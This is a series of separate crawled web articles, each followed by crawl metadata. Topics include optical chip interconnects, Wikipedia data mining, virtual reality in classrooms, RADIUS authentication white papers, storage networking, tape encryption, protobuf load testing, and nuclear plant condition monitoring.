sent from the processor core (over a wire interconnect) to the optical modulator. - The optical manipulator's shutter begins to flicker, transforming the input laser's coherent beam into a series of pulses. - These pulses are picked up by the other core's optical modulator, re-translated into a digital signal, and sent to the core. - Wash, rinse, repeat. Image courtesy of IBM This isn't a technology that's going to turn up in the next generation or two of processor cores. In fact, its limitations for applicability for this are quite strict. The waveguide structure needs to have a width that is on the order of the wavelength of the light used—IBM used 500nm wide waveguides, which is just about as small as you can go. The length of the device is also limited, in this case to one-half of the wavelength, and IBM's optical modulator is about 200 micrometers (µm) long. To put this in perspective, Intel is currently fabbing CPUs on a 45nm process. Clearly, if the cores are separated by 200-400µm, then there is both room and reason to implement optical interconnects. On the other hand, this is close to a ready-built optical bus between chips. When viewed from the point of view of bottlenecks, the main memory to cache may be the bottleneck removed by this technology. That is not to say that this will never have a place inside the chip. Building a multicore CPU of the size and complexity IBM is envisioning will require a sea change in how processor design and system-level interconnects are designed and there is certainly a role for optical interconnects there. We covered this particular topic in some detail last April, during a conversation with Intel regarding its Terascale 80-core initiative. Even though the companies are different, the fundamental challenge of designing these type of products is largely the same and Intel's work on a silicon laser indicates that they are thinking along the same lines. One thing that isn't going to change between then and now, however, is the need for different cores on the same die to communicate. In that regard, IBM's new nanophotonic transmitter has a certain pertinence today, even if actual deployments of the technology lie far in the future. Chris Lee contributed to this story.
<urn:uuid:1a4a0875-b453-4249-a6d8-add05275b390>
CC-MAIN-2017-09
https://arstechnica.com/gadgets/2007/12/ibm-reveals-core-to-core-optical-dream-in-progress/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00380-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952121
789
3.921875
4
One Giant Leap for Psychohistory For science fiction buffs, many news items coming out of the world of predictive and large-scale historical analysis invoke Asimov’s concept of Psychohistory, in which probabilistic group patterns can predict major future events in history. While big data platforms today may not be able to predict the eventual fall of Galactic Empires (although predicting revolutionary events from social data is a reality) they can generate insights based on large swaths of historical data. In particular, Kalev Leetaru from the University of Illinois carried out a fascinating historical analysis project where he mapped “the world according to Wikipedia” SGI’s UV2, a system which the company has touted as “the world’s largest in-memory data mining system.” Leetaru explains the genesis of the project below. Leetaru had already used similar analytics in publishing his Culturomics 2.0, where he, according to SGI, predicted the Arab Spring and the location of bin Laden’s hideout. When he was approached by SGI’s Michael Woodacre about the new UV2 system, which would apparently carry 4,000 processors and 64,000 terabytes of cached coherent shared memory, he thought immediately of Wikipedia. “Wikipedia,” Leetaru said “has become such a fundamental part of our daily life. What could we do if we made a map of this or a series of maps over time?” So Leetaru set out to model the world according to Wikipedia’s English-Language edition. The task itself is simple to comprehend, essentially Leetaru wanted to mark down every mention of a name, date, or place found in Wikipedia. “We used this UV2 system to pull out every geographic location across every page,” said Leetaru “every date across every page, and every connection among those, basically capturing the spatial and temporal view of history as captured by Wikipedia’s pages…We can actually see history before our own eyes.” Of course, there are over four million entries in the English version of Wikipedia, each of which have multiple references to any given date, place, or name. If those references are the neurons of Leetaru’s project, the connections are the synapses. Leetaru had to deal with and analyze one heck of a historical neural net. UV2’s impressive in-memory capabilities made this possible for Leetaru. “I didn’t spend hours or days writing some fancy code that was distributed memory or using any of these fancy extensions, having to worry about memory management, allocating the right buffer sizes. I just wrote a ten line Perl script in a matter of minutes and just ran it… If I had to summarize the advantage of the UV2 platform in a single sentence, I think it would be ‘Outcomes over algorithms.’” The outcome is represented in a fascinating infographic on SGI’s Facebook page, which goes over number of date mentions per year, sentiment over time and much more. For example, the sentiment over time graph shows sharp dips around the 1860s, 1910s, and 1940s. Those dips correspond with the American Civil War (the sharpest dip, perhaps shedding some light on the American bias in English-language Wikipedia articles) and both World Wars. There are plenty more insights to be gleaned and plenty to be extrapolated. Leetaru’s research shows that the world has become exponentially more interconnected over the last fifty years. This connectivity makes it easier to digitalize human patterns and apply data analysis to them. Perhaps Asimov’s psychohistory is not thousands of years away after all.
<urn:uuid:d60ffc05-0f37-4bf3-bef7-ec45c81d6b80>
CC-MAIN-2017-09
https://www.datanami.com/2012/09/11/one_giant_leap_for_psychohistory/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00380-ip-10-171-10-108.ec2.internal.warc.gz
en
0.928364
783
2.921875
3
As Julie strolls through her virtual classroom space she has forgotten for the moment that the room her students occupy is simply a vacant shell. Seats and cubbies line the wall, but the room is empty except for the students. Nonetheless, one group of students is touring the Coliseum in Rome, another is visiting the Louvre in Paris. In the corner, a third group is participating in a dissection of Timurlengia euotica, a dinosaur of the Jurassic period. The fourth group is tackling advanced mathematical concepts dealing with time-varying three-dimensional solids. The objects and environment that the students and teacher are seeing and interacting with are visible by means of virtual or mixed reality presented through head-mounted displays. Virtual reality is fundamentally changing education. The exponentially-increasing power of computing, graphics display, audio processing, and tactile feedback have combined with wearable computing and the Internet of Things to create virtual environments so real the experience has been described as, “squeal-demanding, face-melting, mind-bending, and soul-rending.” The technology now bears no resemblance to early precursors like Nintendo Virtual Boy or Sega VR. Though the term virtual reality is most common, the version best suited to the classroom is mixed or augmented reality, which combines computer-generated objects with the real world. This enables students to see their hands touching virtual 3D objects. They also see the teacher and other students as they interact in the mixed reality world. Win Google Cardboard – take our short survey Share your thoughts on virtual reality. Spend two minutes on our survey and you’ll be entered into our drawing for Google Cardboard virtual reality headsets. If you are among the 10 names drawn from all the survey participants, we’ll send you a Google Cardboard kit to turn your smartphone into a virtual reality headset. All you have to do is participate in our short survey on virtual reality in education. The survey takes only 2-3 minutes to complete. Your responses are important whether or not you have personal experience with virtual reality. Ten Google Cardboards will be awarded. Take the survey now. Educators are already bringing VR into the classroom K-12 educators are finding new and diverse ways to improve teaching and learning with VR. From the beginning, Google has targeted their Google Cardboard, a very low cost (from $15) means of using existing smartphones for immersive VR, especially for K-12 educators. The free Expeditions Pioneer Program provides guided tours for up to 50 students at a time to places like Buckingham Palace, Machu Picchu and the Great Barrier Reef. Teachers at Hartshorn School in New Jersey take their students on tours of coral reefs and landscapes in places like Greece and Egypt. Virtual reality will have a growing role in helping to teach disabled students, children with learning disabilities, and students unable to attend school. Penn State engineering school has developed a virtual reality system that provides an immersive classroom experience to distance learning students. “So the Oculus Rift is fantastic. If you’ve used it in its original incarnation, you know that it’s incredible. It’s virtual reality done better than you’ve ever seen it before. It’s revolutionary. And it’s nothing compared to what’s coming next. I mean Oh. My. God.” – From I Wore the New Oculus Rift and I Never Want to Look at Real Life Again Colleges have begun offering courses specifically in VR design. The University of Maryland, College Park, launched a class on virtual reality that gives students the opportunity to design their own interactive world, work with 3D audio and experiment with immersive technology through a combination of hands-on learning and case studies. The University of Georgia offers similar classes in which students design and explore applications for VR. Conrad Tucker, an assistant professor of engineering at Pennsylvania State University, has received funding to build a virtual engineering lab where students hold, rotate, and fit together virtual parts as they would with their real hands. What virtual reality systems are available today? The concept of virtual reality received worldwide attention when Facebook announced their purchase of Oculus for $2B. Previous to that, Oculus had raised $2.4M on Kickstarter. But now VR was ready. That was two years ago. The Oculus Rift consumer versions have been shipping since March, but demand is so high that new orders have about a six week lead time. Samsung’s Gear VR is a step up from Google Cardboard, but is priced at $100 and is specifically designed to hold Samsung’s Galaxy S6, S7, and Note5. It runs Oculus software. Microsoft has begun shipping their Hololens augmented or mixed reality headset to software developers. The system blends holographic content into the physical world. The developer headsets are priced at $3,000, but they have not yet announced the consumer version pricing or when it will ship. Guesses at final pricing range from $500-$1500. Meta Company is selling developer kits of their Meta 2 augmented reality system for $949. Like Hololens, it adds 3D content to the real world as seen through the headset. No consumer release date has been yet announced. Magic Leap is probably generating the most anticipation of any high tech launches in recent history. The company is valued at $4.5 billion as of their last round of financing with major investments by Google, Alibaba, and Qualcomm. Their company uses the term mixed reality to describe their product’s ability to mix computer-generated 3D images with the real world. The company claims it creates the mixed reality images by projecting virtual elements from a light source at the edge of the glass, which are then reflected into the user’s eyes by beam-splitting nano-ridges. Additional noteworthy systems include Vive from the team of HTC and Valve, priced at $799 and shipping within three days of ordering; and Sony Playstation VR, slated to debut in October at the price of $499.99. In addition to revolutionizing education, will VR make us happier? Where will virtual reality lead? The positive, and hopefully most realistic view is that it will only improve our education system and enrich our lives. As ever-more possibilities for VR are thought up, each will be evaluated as either enhancing or detracting from our life experience and either included or discarded as appropriate. One fear is that advertising and commercialism could further invade our daily lives. This won’t happen as long as such intrusions are kept as opt-in only. This Hyper-Reality video by Keiichi Matsuda gives a dystopian view of what could happen by unchecked intrusion into a virtual reality future.
<urn:uuid:1ecfdda4-bc26-4b59-8147-a9e09f4659d8>
CC-MAIN-2017-09
https://content.extremenetworks.com/h/i/319064616-a-virtual-revolution-in-education
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00324-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945498
1,380
3.5
4
Home » AAA RADIUS Server White Papers History of the AAA RADIUS Server and RADIUS Protocol The story of how the RADIUS server and RADIUS protocol came into existence, became a de-facto standard, and eventually a recognized IETF standard. Starting from from dial in security needs at Merit Network, RADIUS weaved its way through the standards process, first as a de-facto standard for NAS equipment vendors, and then through the IETF standards body to become the internationally recognized standard for network authentication, authorization, and accounting. Introduction to Diameter The Diameter protocol was designed to overcome some of the earlier shortcomings of RADIUS and is being adopted by an ever expanding set of AAA requirements. This white paper provides an introduction to the Diameter protocol, advantages over RADIUS, and the applications targeted by Diameter. Link Layer and Network Layer Security for Wireless Networks Wireless networking presents a significant security challenge. There is an ongoing debate about where to address this challenge: at the link layer (via 802.1X and a RADIUS server) or network layer (via VPN). This paper looks at the basic risks inherent in wireless networking and explains both approaches, but concludes that link layer security provides a more compelling, complete solution and that network layer security serves well as an enhancement in applications where additional WLAN security is requested. Wireless LAN Access Control and RADIUS Server Authentication Wireless networking is emerging as a significant aspect of Internetworking. It presents a set of unique issues based on the fact that the only bounds for a wireless network is the radio signal strength. There is no wiring to define membership in a network. Wireless networking, more than any other networking technology, needs an Authentication and Access Control mechanism. This paper looks at the access authentication issues, the existing and proposed technologies, and scenarios for use of a RADIUS Server for Wi-Fi Authentication. Introduction to the RADIUS Server and 802.1x for Wireless Networks Many new WiFi access points are advertised as employing IEEE 802.1X for enhanced security. Trade articles about this new technology call it a “security protocol,” a “security feature,” a “security standard,” an “authentication method,” or a “user authentication protocol” and promise “enhanced security” and a “more secure environment.” These claims do not always provide an accurate picture of how 802.1X fits into WiFi security. Despite all the hype, 802.1X through a RADIUS server, if utilized properly, can indeed provide a WiFi network with a higher level of security.
<urn:uuid:36f24385-6537-4525-9874-7de250f8a2a5>
CC-MAIN-2017-09
https://www.interlinknetworks.com/aaa-white-papers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00024-ip-10-171-10-108.ec2.internal.warc.gz
en
0.904825
553
3.09375
3
Storage networking is built on three fundamental components: wiring, storing, and filing. BY MARC FARLEY Storage networking provides storage applications on any number of suitable wiring technologies. In general, storage networking products have been associated with specific network technologies. Storage area network (SANs) have been associated with Fibre Channel technology, and network-attached storage (NAS) is considered to be an Ethernet technology. Unfortunately, identifying storage network technologies with specific data networks has not helped people understand the abstract architectural components of storage networking. (See InfoStor, September 2001, p. 28, for Part I of the book excerpt.) Storing and filing as network applications Filing is familiar as a client/server application where both client and server perform similar communications functions. For example, a server for one group of clients may itself be a client of some other server. It is strange to think about it as such, but on a communications level, not an application level, clients and servers are peers. Storing, however, is built on a different type of relationship. Storing-level communications is based on a master/slave model where host system initiators are master entities issuing commands and storage devices/ subsystems are slave entities responding to those commands. In general, the slave entities have much less flexibility than the masters that direct their operations. Notable exceptions to this arrangement include devices and subsystems with implemented embedded initiator functionality such as disk drives with integrated XOR processing and backup equipment with third-party-copy capabilities. Even in these cases, however, the embedded initiator in the device is used for specific applications and not for general-purpose storage communications. Figure 1: The hierarchy of storing and filing in a single system. There is an implied hierarchy between storing and filing, where users and applications access data on the filing level and where filing entities such as file systems and databases access the data on a storing level. This hierarchy exists as an internal relationship within nearly all systems used today. This hierarchy, along with the corresponding I/O stack functions, is depicted in Figure 1. Although a hierarchy exists between storing and filing, it is not always necessary for it to be implemented as in Figure 1. Filing can access the wiring function independently without first passing through a storing function, as shown below. The preceding drawing is the scenario usually used to show how NAS systems work. Analyzing the I/O path in more detail, however, one realizes the necessity for the client/server filing operation to be converted to a master/slave storing function and transmitted by the server over some sort of wiring to the destination storage devices. This conversion is done by a data structure function within the server's file system that determines where data is stored in the logical block address space of its devices or subsystems. For most NAS products today, the wiring function used for storing operations is a storage bus. When all the pieces of the I/O path are put together for NAS, we see that the NAS system provides filing services to network clients and incorporates some type of storing function, typically on independent sets of wiring, as shown above. While individual NAS vendors and their particular products may have specific storing and wiring implementations, no architectural requirements for storing or wiring are implied by the NAS concept. Therefore, NAS is considered to be mostly a filing application that uses the services provided by storing and wiring. Although a particular NAS product may implement specific wiring and storage technology, the primary external function provided to customers is its filing capabilities. SAN as a storing application Storing functionality can be generalized as the master/slave interaction between initiators and devices. Storing is deterministic by design to ensure a high degree of accuracy and reliability. To some degree this is a function of the underlying wiring, but it is also a function of the command sequences and exchanges used in storing. Several storing technologies are available, the most common being the various flavors of SCSI commands. It can be very hard to separate the storing function from the wiring function when one looks for product examples. For instance, a Fibre Channel host bus adapter (HBA) is certainly a part of the wiring in a storage network, but it also provides functionality for processing SCSI-3 serial data frames. It is important to realize that the SCSI-3 protocol was developed independently of Fibre Channel technology and that nothing inherent in SCSI-3 ties it to Fibre Channel. It is independent of the wiring function and could be implemented on Ethernet or many other types of network. Similarly, there is no reason another serial SCSI implementation could not be developed and used with Fibre Channel or any other networking technology. In fact, there is no reason that SCSI has to be part of the equation at all. It is one of the easiest storing technologies to adopt because it has been defined for serial transmission, but there certainly are other ways to control devices and subsystems. So what is a SAN? It is the application of storing functionality over a network. SANs by definition exclude bus types of wiring. SANs provide deterministic control of storage transmissions, according to the implementation details of the storing protocol used and the capabilities of the underlying network. Aligning the building blocks of storage networking Storage networking is certainly not "child's play," but that doesn't mean we can't approach it that way. Certainly the SAN industry has made a number of ridiculous puns and word games surrounding SAN and sand, so with that as an excuse, we'll discuss building blocks. The three building blocks we are interested in, of course, are these: As discussed previously, the implied and traditional hierarchy of these building blocks within a single system is to place wiring on the bottom and filing on top, such that storing gets to be the monkey in the middle, like this: Of course, in the worlds of NAS and SAN, these blocks have been assembled like this: But if we want to take a detailed view of NAS, we know that NAS actually has a storing component as well, which is often parallel SCSI, and we place the building blocks within client and server respectively, like this: But as we've been saying in this article, wiring is independent from both storing and filing and, in fact, can be the same for both. So we've structured the building blocks of filing (NAS) and storing (SAN) on top of a common wiring, like this: Now the preceding drawing is probably only interesting in theory, as something to illustrate the concept. In actual implementations, it is probably a good idea to segregate client/server traffic from storage traffic. This provides the capability to optimize the characteristics of each network for particular types of traffic, costs, growth, and management. That said, it might also be a good idea to base the two different networks on the same fundamental wiring technology. This allows organizations to work with a single set of vendors and technologies. As long as a common wiring technology can actually work for both types of networks, there is the potential to save a great deal of money in the cost of equipment, implementation, training, and management. This type of environment, shown in Figure 2, includes a storage device as the final destination on the I/O path. Race for wiring supremacy Three networking technologies have the potential to provide a common wiring infrastructure for storage networks. The first is Fibre Channel, the next is Ethernet, particularly Gigabit Ethernet, and the third is InfiniBand. We'll make a brief comparison of their potential as a common wiring for storage networks. Figure 2: Common wiring, but separate networks for filing and storing. Fibre Channel strength Fibre Channel's primary strengths are precisely where Ethernet has weaknesses. It is a high-speed, low-latency network with advanced flow control technology to handle bursty traffic such as storage I/O. However, its weaknesses are the major strengths of Ethernet. The Fibre Channel industry is still small compared to Ethernet, with limited technology choices and a relatively tiny talent pool for implementing and managing installations. The talent pool in Fibre Channel is heavily concentrated in storage development companies that have a vested interest in protecting their investment in Fibre Channel technology. This does not mean that these companies will not develop alternative wiring products, but it does mean that they will not be likely to abandon their Fibre Channel products. Of the three technologies discussed here, Fibre Channel was the first to develop legitimate technology for common wiring. But technology alone does not always succeed, as has been proven many times throughout our history. The Fibre Channel industry has never appeared interested in its potential as a common wiring. Although it has a technology lead, having begun as the de facto standard for SANs, it is extremely unlikely that Fibre Channel will cross over to address the NAS, client/server market. Ethernet has the obvious advantage of being the most widely deployed networking technology in the world. There is an enormous amount of talent and technology available to aid the implementation and management of Ethernet networks. While the 10Mbps and 100Mbps Ethernet varieties are sufficient for NAS, they are probably not realistic choices to support SANs because of their overall throughput limitations and lack of flow control implementations. Therefore, Gigabit Ethernet would likely be the ground floor for storing applications such as SANs. However, even though Gigabit Ethernet has the raw bandwidth and flow control needed for storage I/O, most Gigabit Ethernet switches do not have low enough latency to support high-volume transaction processing. There is little question that Ethernet will be available to use as a common wiring for both filing and storing applications, but its relevance as an industrial-strength network for storing applications has to be proved before it will be deployed broadly as an enterprise common wiring infrastructure. InfiniBand in the wings The latest entrant in the field is InfiniBand, the serial bus replacement for the PCI host I/O bus. InfiniBand's development has been spearheaded by Intel with additional contributions and compromises from Compaq, Hewlett-Packard, IBM, Sun, and others. As a major systems component expected to be implemented in both PC and Unix platforms, InfiniBand is likely to become rapidly deployed on a large scale. In addition, a fairly large industry is developing the equivalent of HBAs and network interface cards for InfiniBand. Therefore, InfiniBand is likely to grow a sizable talent pool rapidly. In relation to storage networks, the question is: Will storing and/or filing applications run directly across InfiniBand wiring, as opposed to requiring some sort of InfiniBand adapter? Immediately, soon, years away, or never? The technology probably needs to gain an installed base as a host I/O bus before it can effectively pursue new markets such as storage networking. However, InfiniBand certainly has the potential to become a legitimate storage wiring option at some point in the future. As the apparent method of choice for connecting systems together in clusters, along with their associated storage subsystems, this could happen sooner than expected. As with any other networking technology, it is not so much a question of whether the technology can be applied but rather when attempts will be made and by whom with what resources. There aren't any crystal balls to predict the future of storage networking. However, any time functions can be integrated together in a way that reduces cost and complexity, the only question is whether it can be marketed successfully. Common wiring is more than a theoretical abstraction for storage networks, but it represents a large opportunity to integrate data networks and storage channels under a single technology umbrella. As Fibre Channel, Ethernet, and InfiniBand technologies evolve in response to this integration gravity, it is almost inevitable that NAS and SAN developers will look for ways to combine functionality, and their products will look more and more alike. The terms NAS and SAN will seem completely arbitrary or obsolete, and it will be necessary to distinguish storage products by the storing and filing applications they provide, as opposed to the limitations of their initial implementations. At that point, a whole new level of storing/filing integration will become visible and true self-managing storage networks may be possible. But first, the wiring slugfest! The table briefly summarizes the competing technologies that could be used to form a common wiring and their current status. This article discusses the fundamental components of storage networks-wiring, storing, and filing-in relation to the most common applications of storage networks today: NAS and SAN. More than just the similarity of the acronyms used, NAS and SAN have confused the industry and the market because of their similarities and the lack of an architectural framework to view them in. NAS, the application of filing over a network, has two important roles. First, it provides a service that allows applications and users to locate data as objects over a network. Second, it provides the data structure to store that data on storage devices or subsystems that it manages. SAN, on the other hand, is the application of storing functions over a network. In general, this applies to operations regarding logical block addresses, but it could potentially involve other ways of identifying and addressing stored data. Wiring for storage networks has to be extremely fast and reliable. Fibre Channel is the incumbent to date, but Gigabit Ethernet and InfiniBand are expected to make runs at the storage network market in years to come. The development of a common wiring infrastructure for both filing (NAS) and storing (SAN) applications appears to be inevitable, and it will deliver technology and products that can be highly leveraged throughout an organization. Marc Farley is a storage professional and author of Building Storage Networks, First and Second Editions. This article is excerpted with permission from Building Storage Networks, Second Edition, by Marc Farley (Osborne/ McGraw-Hill, ISBN 0-07-213072-5, copyright 2001).
<urn:uuid:2f231be6-5558-479a-b347-d81292b749ff>
CC-MAIN-2017-09
http://www.infostor.com/index/articles/display/123544/articles/infostor/volume-5/issue-10/features/part-ii-building-storage-networks-a-book-excerpt.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948459
2,830
2.921875
3
GCN LAB IMPRESSIONS Can talking about technology make you smarter? - By Greg Crowe - Jun 27, 2011 You can debate whether technology makes us smarter or just gives us more data to process. But apparently, talking about technology could actually improve the human brain. New findings released by archaeologists at Lund University in Sweden indicate that developing or even communicating about new technologies has led to developments in the way we think and behave as a species. They discovered that, although homo sapiens have lived on the planet for about 200,000 years, it was only about 100,000 years ago that advanced tool-making technology, for crafting things such as spearheads, came about. In order to reach that plateau, the study says, increased social interaction had to occur, and over generations, the actual makeup of our brains altered. So, in essence, people getting together, planning and talking about technology had a positive impact on the physical structure of our brains — that is, talking about it made us naturally smarter. And each generation was more adapted to the new technology than the last and, hence, smarter still. Evidence of this exists today. Anyone who has ever witnessed a preteen teaching his or her grandparents how to get online to check their e-mail or even program their digital video recorder will tell you that the new generation tends to be more tech-savvy than the one before it. Some could argue that it is simply that younger generations are exposed to technology at an earlier age, thus making them more practiced. And although that might be true to a certain extent, these new findings seem to indicate that there is also a biological predilection for younger generations to be smarter than older ones. Of course, any live experiment to prove this would no doubt involve raising control subject children in isolation and periodically introducing technology to them to see what they do with it. And that would probably get the torch-and-pitchfork crowd chasing after the scientist in charge of said experiment. But if anyone does decide to run such an experiment, it would be an ideal environment to also run my long-term cell phone exposure effects experiment. Wait...torches...pitchforks...on second thought, forget I said anything. So in light of these new findings, the staff here at GCN will continue doing what we have done for the past 29 years: talk about technology and contribute to ultimately making the human species smarter. You are welcome. Greg Crowe is a former GCN staff writer who covered mobile technology.
<urn:uuid:55c225fa-7b77-4459-9a40-62f62dba8ada>
CC-MAIN-2017-09
https://gcn.com/articles/2011/06/27/talking-about-technology-makes-you-smarter.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963469
522
2.734375
3
Best Practices for choosing and implementing a storage encryption solution Once you decide that a solution is required in order to meet regulatory or good business governance requirements you must choose between a single platform or a corporate-wide solution. It is usually better to standardize on one solution for all platforms. Next you must determine which option is best for your environment - software-only or hardware. Software often does not offer compression. Hardware units—whether built into the drive or of an inline design—use hardware compression prior to encryption. Software compression relies upon the system processing power to do the work. Hardware compression is not system-reliant. Software normally involves several updates during the life of the system. Hardware does not change even if the complete system or OS is changed. Software encryption is not available for all systems. Hardware encryption works on all system types. Some backup packages do not include encryption and therefore require a change of package. Hardware encryption works on all backup solution packages without the need for any configuration changes. With software, the user key is kept on the system, so the system or network is open to attack. With hardware tape encryption, the key can be kept in the device and so cannot be read from any external device. Software is normally restricted to a single operating system type. Hardware is system-independent. Software encryption usually needs to be upgraded when the OS is upgraded. Hardware, being platform-independent, does not need to be changed when the OS is upgraded. Software is often a low cost solution, and dependent on the OS being used. Hardware is normally the same cost whatever the OS. Software costs are often based on the capacity of the attached library. Hardware costs are fixed. What to Encrypt? Another issue raised is whether to encrypt only the sensitive data or to encrypt everything. The concept of encrypting only the sensitive data appears to be very attractive because it minimizes the amount of extra processing. The downside is that someone has to make the decision as to what is sensitive and what is not. Another area of contention is when to implement a solution. Should you look at what is readily available and “field proven” or wait for the availability of the “ultimate solution” real soon? From the beginning, it should be understood that there may be individuals within the business who will not understand the risks and will fight against any attempts to integrate a solution into the infrastructure. Many MIS departments see backup as non-productive. Another potential issue is the funding for this solution. A vital point to consider is what to do with the existing pool of tapes used for backups and archives. Is it possible to reuse the existing media? Does the solution require continual monitoring and operational input? Does your solution take into consideration migration to a new system? An external hardware solution with dedicated compression and encryption engines will not suffer from the problems and complexities that software may suffer from. The DR Implications Any good tape encryption solution must be such that it does not hinder or overcomplicate this already stressful operation. Statistics show that if you fail to restore your business data and get your business back up in a timely manner, the result 80% of the time is the total collapse of your business. Be cautious against choosing a solution that is over-complex, needs specialists to install on the DR site, or has a difficult key-management system. Where Should a Hardware Solution Reside? In the Server When encryption is built into the server, it is system-dependant and will be very disruptive to install. The downside is that it must also reside in any DR or development systems in order to be utilized for DR or development. With host-based encryption using a standard encryption card, any user who has decided to implement the same methodology will have exactly the same physical hardware as you. In the Drive There are only a limited number of truly integrated drive-based solutions on the market, and these are new and, so far, unproven. Most solutions are limited to a new media type in order to allow encryption. The whole system’s security is based on a single external key, and as the drives are standard; hence, key management of such a product is of paramount importance. With drive-based encryption using a standard encryption card, any user will have exactly the same physical hardware as you. These devices are normally the simplest to install and cause the least disruption and the keys can be securely loaded into the appliance, which needs no network connection to the system so is inherently more secure. These systems are transparent, and drives can be rolled out across a heterogeneous environment very easily. These solutions also offer the easiest use in a DR situation. Encryption is the best way for businesses to meet the increasing need for privacy protection. 10ZiG offers two storage security solutions to protect your data at rest. The Q3 is a stand-alone storage encryption appliance. The Q3i is a tape drive with built-in PCI compliant encryption. For more details, visit www.theq3.com or contact 10ZiG at email@example.com. Contact us at 866-865-5250 or for a free 30-day trial or for more information.
<urn:uuid:9a26d62f-c64e-42fe-b842-95ec8ebab72b>
CC-MAIN-2017-09
http://www.10zig.com/choosingencryption.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171933.81/warc/CC-MAIN-20170219104611-00376-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927772
1,091
2.625
3
Web and cloud applications need more than just good programming to run: The server infrastructure needs to have enough resources to handle the requests of every concurrent user. Inadequate infrastructure can lead to sluggish performance—or even total failure, if too many users push data at the same time. Load testing is a process that involves running virtual users against an application to determine if it performs efficiently under a given workload and gauge the maximum number of users it can simultaneously support. ZebraTester is a toolkit built to perform load tests and interpret the results. The ZebraTester program utilizes Google’s Protocol Buffers, or protobuf, to serialize data for efficient transfers during the load testing process. Protobuf stores data like XML and JSON, but with one key difference: It does not feature data field or data type information, tags, or values. It efficiently moves only the raw data and relies on sequential order to re-assign values when received. FileDescriptorSets, or .desc files, are used to match the data with the designated values. ZebraTester then interprets this data in a human-readable way. Automatic Protobuf Message Detection ZebraTester automatically examines all recorded data from load tests to determine if it includes protobuf data. The program intuitively examines the HTTP request and responses for matching text fragments containing the string “protobuf” in the “Content-Type” header field, and produces a warning message if any information is missing or incorrectly assigned. Loading the FileDescriptorSet The previously mentioned .desc files are an essential part of the testing process, as ZebraTester requires this information to produce human-interpretable test results. Running a test requires supplying the transmitted data’s compatible .desc file. Testers can generate the desc file from the source .proto file via a protoc compiler using the following command structure: protoc –descriptor_set_out=filename.desc filename.proto The application development team can provide the testing team with the correct .proto file for the test. Assign the .desc file in ZebraTester by copying it to your local machine and registering it as an “External Resource” via the “Declare External Resources” menu. Configure the Message Type The program uses the .desc file to display the transferred data with the relevant field title and related information, but requires configuration to enable this functionality. When this feature is enabled, it’s easy to extract and assign variables and values in the transmitted messages. You can configure the message type by going to the main menu, selecting the link on “Configure the Message Type for all G-PROTOBUF Requests and Responses,” and clicking the magnifying glass for “HTTP Request” or “HTTP Response” under the “Message Type” column. From here the tester can select the message type from the menu or select the question mark icon to automatically assign the type (if the tester does not know the correct value). Extracting and Assigning Variables Testers can adjust message field information in ZebraTester as long as the .desc file and message type values are properly configured. To adjust values, select the “PROT” icon from either the “Request” or “Response” content window on the “URL Details / Var Handler” page. This will display a list of editable values with the relevant field names and data types in a table. Running the Load Tests ZebraTest can execute the load test program with any protobuf value changes in the same way as when the values are left alone. The program automatically combines all the required resources in a ZIP archive and distributes them to the load generators. For more information on configuring and executing protobuf load tests with ZebraTester, check out the full guide here.
<urn:uuid:853de615-f076-4cce-bb29-94cd9ccc47f4>
CC-MAIN-2017-09
https://www.apicasystem.com/blog/configuring-and-adjusting-google-protocol-buffer-load-tests/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00496-ip-10-171-10-108.ec2.internal.warc.gz
en
0.78936
826
2.625
3
Hashemian H.M.,AMS Corporation Progress in Nuclear Energy | Year: 2011 The nuclear power industry is working to reduce generation costs by adopting condition-based maintenance strategies and automating testing activities. These developments have stimulated great interest in on-line monitoring (OLM) technologies and new diagnostic and prognostic methods to anticipate, identify, and resolve equipment and process problems and ensure plant safety, efficiency, and immunity to accidents. This paper provides examples of these technologies with particular emphasis on eight key OLM applications: detecting sensing-line blockages, testing the response time of pressure transmitters, monitoring the calibration of pressure transmitters on-line, cross-calibrating temperature sensors in situ, assessing equipment condition, performing predictive maintenance of reactor internals, monitoring fluid flow, and extending the life of neutron detectors. These applications are discussed in the following sections. Emphasis is placed on the principles of a core OLM method - noise analysis - and the technical requirements for an integrated OLM system are summarized. © 2010 Elsevier Ltd. All rights reserved. Source Hashemian H.M.,AMS Corporation IEEE Transactions on Instrumentation and Measurement | Year: 2011 Condition-based maintenance techniques for industrial equipment and processes are described in this paper together with examples of their use and discussion of their benefits. These techniques are divided here into three categories. The first category uses signals from existing process sensors, such as resistance temperature detectors (RTDs), thermocouples, or pressure transmitters, to help verify the performance of the sensors and process-to-sensor interfaces and also to identify problems in the process. The second category depends on signals from test sensors (e.g., accelerometers) that are installed on plant equipment (e.g., rotating machinery) in order to measure such parameters as vibration amplitude. The vibration amplitude is then trended to identify the onset of degradation or failure. This second category also includes the use of wireless sensors to provide additional points for collection of data or allow plants to measure multiple parameters to cover not only vibration amplitude but also ambient temperature, pressure, humidity, etc. With each additional parameter that can be measured and correlated with equipment condition, the diagnostic capabilities of the category can increase exponentially. The first and second categories just mentioned are passive, which means that they do not involve any perturbation of the equipment or the process being monitored. In contrast, the third category is active. That is, the third category involves injecting a test signal into the equipment (sensors, cables, etc.) to measure its response and thereby diagnose its performance. For example, the response time of temperature sensors (RTDs and thermocouples) can be measured by the application of the step current signal to the sensor and analysis of the sensor response to the application of the step current. Cable anomalies can be located by a similar procedure referred to as the time domain reflectometry (TDR). This test involves a signal that is sent through the cable to the end device. Its reflection is then recorded and compared to a baseline to identify impedance changes along the cable and thereby identify and locate anomalies. Combined with measurement of cable inductance (L), capacitance 